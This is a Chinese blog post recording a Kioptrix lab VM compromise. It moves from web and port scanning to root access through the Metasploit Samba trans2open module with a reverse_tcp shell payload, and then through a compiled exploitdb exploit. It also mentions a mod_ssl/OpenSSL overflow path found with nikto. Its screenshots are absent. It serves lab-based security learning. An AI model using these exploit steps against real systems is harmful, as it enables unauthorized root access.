kioptrix靶机记录

靶机地址:172.16.1.193

Kali地址:172.16.1.107

 

首页为Apache测试页,没看到有价值信息

 

尝试目录扫描:

 

 

 

点击查看:

http://172.16.1.193/index.html

  http://172.16.1.193/manual/

    http://172.16.1.193/manual/mod/mod_ssl/

User manual  mod_ssl version 2.8

 

http://172.16.1.193/usage/

  Webalizer

http://172.16.1.193/mrtg/                                                     

好吧,我还是不要在web上执迷不悟了,端口扫描看看。

 

 

 

发现了139端口,sambaKalimsf尝试攻击

 

 

 

使用第11个,exploit/linux/samba/trans2open,设置目标ip为靶机地址

 

 

 

show payloads 查看可使用的载荷

 

 

 

选择反弹shell的方式,set payload linux/x86/shell/reverse_tcp,运行

 

 

 

expolit得到反弹shell

 

 

 

权限为root,完成

 

漏洞利用方法二:

Kali搜索

 

 

  

使用/usr/share/exploitdb/exploits/multiple/remote/10.c,复制出来,使用gcc编译

 

 

 

查看并设置参数执行。获取root权限

 

 

完成。

 

注:

  网上还有其他方法

使用Apache OpenSSL溢出漏洞利用

使用nikto扫描

  命令nikto -h 172.16.1.193 -o result.html

 

 

发现可用信息:

 mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

 

Kali搜索Apache OpenSSL,选择利用

 

 。。。该方法也能拿到root权限。

posted @ 2019-12-26 13:42  Dis-a  阅读(356)  评论(0)    收藏  举报